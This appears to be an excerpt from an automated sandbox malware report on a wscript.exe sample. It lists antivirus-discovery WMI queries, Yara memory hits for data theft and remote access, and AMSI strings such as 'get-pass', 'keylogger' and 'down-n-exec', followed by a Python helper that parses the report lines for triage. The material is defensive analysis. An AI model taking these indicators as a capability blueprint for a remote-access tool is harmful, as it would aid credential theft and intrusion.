Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000002.00000003.346293587.0000025291B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.894056339.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525478987.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436933297.000001A3A0C9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.882434337.000001B9F39C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359362375.0000020CC9D9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436804080.000001A3A0C8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.475419032.000001B9F3810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.306663834.0000023FB2AA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.365466857.0000020CC9121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.346110513.0000025291AEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.345846246.0000025291B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525911410.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436967612.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.362775717.0000020CC9DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.870934692.00000252913C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.459088306.000001A3A05B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359178897.0000020CC9DA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.360228659.0000020CC9120000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.524775302.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.442339424.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.312164849.0000023FB2B5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.364188132.0000020CC934C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.307173276.0000023FB2943000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.857351439.0000025290FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.306477021.0000023FB35AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473292279.000001B9F43D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.437852144.000001A3A0010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.306511935.0000023FB35C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.347539680.0000025290E23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.878368097.0000025291B0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525586861.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.311353679.0000023FB35E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.307581623.0000023FB294F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359292280.0000020CC9D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.346359959.0000025290FB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473654682.000001B9F43BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473826322.000001B9F43CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.360037491.0000020CC9113000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436996885.000001A3A01A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.346253406.0000025291AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.443498942.000001A3A024C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436753264.000001A3A0CA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473870911.000001B9F3994000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359409394.0000020CC92A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.347965187.0000025290E30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525101810.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.475028155.000001B9F3803000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.380509963.0000020CC9C80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.324728490.0000023FB34A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.883442418.000001B9F3D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.839366000.0000025290DE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 2332, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1956, type: MEMORYSTR
Source: Yara match File source: 0000000E.00000002.845740262.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.546167949.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.831690125.0000029D80281000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.374542669.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.312853725.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.438571195.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.843784726.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.513971058.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.380177182.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.481502625.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.418142975.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.394046563.0000029D80067000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.355045063.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.439032554.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.374490943.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.823248453.0000029D80067000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.444103192.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.417946998.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.444077557.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.851673503.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.845820210.0000026E2A5DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.355010991.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.514256730.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.891143613.0000029DFD8AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.546431289.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.481574240.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 748, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6100, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 2804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 3232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 2772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5776, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000002.00000003.346293587.0000025291B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.894056339.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525478987.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436933297.000001A3A0C9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.882434337.000001B9F39C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359362375.0000020CC9D9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436804080.000001A3A0C8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.475419032.000001B9F3810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.306663834.0000023FB2AA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.365466857.0000020CC9121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.346110513.0000025291AEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.345846246.0000025291B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525911410.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436967612.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.362775717.0000020CC9DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.870934692.00000252913C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.459088306.000001A3A05B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359178897.0000020CC9DA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.360228659.0000020CC9120000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.524775302.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.442339424.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.312164849.0000023FB2B5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.364188132.0000020CC934C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.307173276.0000023FB2943000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.857351439.0000025290FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.306477021.0000023FB35AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473292279.000001B9F43D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.437852144.000001A3A0010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.306511935.0000023FB35C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.347539680.0000025290E23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.878368097.0000025291B0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525586861.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.311353679.0000023FB35E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.307581623.0000023FB294F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359292280.0000020CC9D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.346359959.0000025290FB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473654682.000001B9F43BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473826322.000001B9F43CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.360037491.0000020CC9113000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436996885.000001A3A01A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.346253406.0000025291AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.443498942.000001A3A024C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436753264.000001A3A0CA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473870911.000001B9F3994000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359409394.0000020CC92A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.347965187.0000025290E30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525101810.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.475028155.000001B9F3803000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.380509963.0000020CC9C80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.324728490.0000023FB34A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.883442418.000001B9F3D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.839366000.0000025290DE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 2332, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1956, type: MEMORYSTR
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string up-n-exec (reported 5 times)
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string get-pass (reported 5 times)
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string down-n-exec (reported 5 times)
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string keylogger (reported 5 times)
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string take-log (reported 5 times)
Source: Yara match File source: 0000000E.00000002.845740262.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.546167949.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.831690125.0000029D80281000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.374542669.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.312853725.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.438571195.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.843784726.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.513971058.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.380177182.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.481502625.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.418142975.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.394046563.0000029D80067000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.355045063.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.439032554.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.374490943.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.823248453.0000029D80067000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.444103192.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.417946998.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.444077557.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.851673503.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.845820210.0000026E2A5DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.355010991.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.514256730.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.891143613.0000029DFD8AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.546431289.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.481574240.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 748, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6100, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 2804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 3232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 2772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5776, type: MEMORYSTR
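The evidence lines in this section are three kinds of record: Yara hits on memory dumps (the long dotted .sdmp identifiers), Yara hits on the live memory space of a wscript.exe PID, and AMSI suspicious-string hits, whose strings (up-n-exec, get-pass, down-n-exec, keylogger, take-log) read like the command vocabulary of a remote-access tool. When a report lists dozens of such lines, the triage question is which analysed processes are involved and how many distinct memory regions per process carry the detection. The helper below is an added example, not Joe Sandbox code, and it assumes the .sdmp identifier layout: eight dot-separated hex words of which the first is the analysed-process index and the fourth the base address of the dumped region; the remaining words are matched but not decoded. The sample input is a constructed excerpt of lines from this section.

```python
import re
from collections import Counter, defaultdict

# Added example (not Joe Sandbox code). Assumption about the .sdmp identifier:
# eight dot-separated hex words, the first being the analysed-process index and
# the fourth the base address of the dumped region; the other words are kept
# as-is and not decoded here.
DUMP_RE = re.compile(
    r"File source:\s+"
    r"(?P<proc>[0-9A-F]{8})\.(?P<phase>[0-9A-F]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-F]{16})(?:\.[0-9A-F]{8}){4}\.sdmp,\s+type:\s+MEMORY\b"
)
PID_RE = re.compile(
    r"Process Memory Space:\s+(?P<image>\S+)\s+PID:\s+(?P<pid>\d+),\s+type:\s+MEMORYSTR\b"
)
AMSI_RE = re.compile(r"Anti Malware Scan Interface:\s+Suspicious string\s+(?P<s>\S+)")


def parse_sources(lines):
    """Split report lines into memory-dump hits, process-space hits and AMSI strings."""
    dumps, pids, amsi = [], [], []
    for line in lines:
        if m := DUMP_RE.search(line):
            dumps.append({"proc": int(m["proc"], 16),
                          "phase": int(m["phase"], 16),
                          "base": int(m["base"], 16)})
        elif m := PID_RE.search(line):
            pids.append({"image": m["image"], "pid": int(m["pid"])})
        elif m := AMSI_RE.search(line):
            amsi.append(m["s"])
    return dumps, pids, amsi


def summarize(lines):
    """Per-process view: which analysed-process indices carry Yara hits, in how
    many distinct regions each, which live PIDs were hit, and which AMSI
    strings recur and how often."""
    dumps, pids, amsi = parse_sources(lines)
    regions = defaultdict(set)
    for d in dumps:
        regions[d["proc"]].add(d["base"])
    return {
        "dump_hits": len(dumps),
        "processes": sorted(regions),
        "distinct_regions": {p: len(b) for p, b in regions.items()},
        "pids": sorted(p["pid"] for p in pids),
        "amsi_strings": dict(Counter(amsi)),
    }


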